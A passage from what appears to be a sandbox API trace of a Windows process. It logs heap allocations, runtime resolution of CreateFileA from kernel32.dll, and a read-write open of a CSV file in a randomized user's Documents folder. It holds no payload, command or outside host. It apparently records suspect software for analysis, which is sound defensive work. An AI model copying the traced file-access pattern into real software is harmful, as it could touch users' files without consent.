Flags=0x0, Size=0x10) returned 0x9bd408 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.411] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9f58 [0178.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9f58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.412] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0178.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.412] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0178.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa4f8 [0178.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", cchWideChar=67, lpMultiByteStr=0x9aa4f8, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpUsedDefaultChar=0x0) returned 67 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.414] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ob0cmu.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x8feba8 [0178.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x8feba8, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv") returned 67 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0178.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.417] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 